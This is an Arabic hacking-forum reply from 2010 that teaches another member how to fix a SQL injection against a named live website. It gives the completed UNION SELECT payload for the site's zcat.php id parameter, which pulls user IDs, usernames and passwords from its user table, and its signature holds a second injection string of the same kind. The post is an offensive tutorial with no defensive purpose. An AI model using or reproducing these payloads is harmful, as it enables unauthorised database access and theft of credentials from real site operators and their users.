عرض مشاركة واحدة
قديم 07-18-2010, 09:23 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
TIKTAKram
 
الصورة الرمزية TIKTAKram
 

 

 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road

افتراضي


أهلا أخي الكريم بك معنا

مشكلتك بسيطة و سببها عدم التركيز كباقي أصدقائك

المهم...! راح أشرح لك المشكلة و أعطيك الحقنة الصحيحة

أنت في الأخير وضعت هكذا :

كود:
 http://www.arzuntarin.com/zcat.php?id=-1%20UNION%20SELECT%201,2,Concat%28id,0x3a,pass%29,4,5+from+information_schema.columns
و هذا خطأ كبير جدا، أنت ما حددت من وين يستخرج اليوزر والباس يعني ما حددت الجدول

يعني نسيت أن تضع FROM+xxx

مثلا في هذه الحالة نضع FROM+USER في آخر الحقنة

المهم...! الآن ! حتى لو نضع هذا سوف يظهر رقم 1 و الباس

و بالتأكيد الرقم 1 ليس اليوزر لأنه الـ ID لذلك سوف نرجع شوي في الحقنة و نضع الأمر group_concat()

و من الأمر سوف نستنتج أن إسمع عمود الـ USER هو USER

يعني الحقنة الأخيرة و التامة و النظيفة هذه هي :

كود:
 http://www.arzuntarin.com/zcat.php?id=-1%20union%20select%201,2,concat%28id,0x3a,user,0x3a,pass%29,4,5+from+user--
بالتوفيق و إن شاء الله أكون قد ساعدتك و في المرة المقبلة ركز أكثر

و بدي أعطيك نصيحة ( أعد مشاهدة الدروس من أول درس )

بالتوفيق
التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

رد مع اقتباس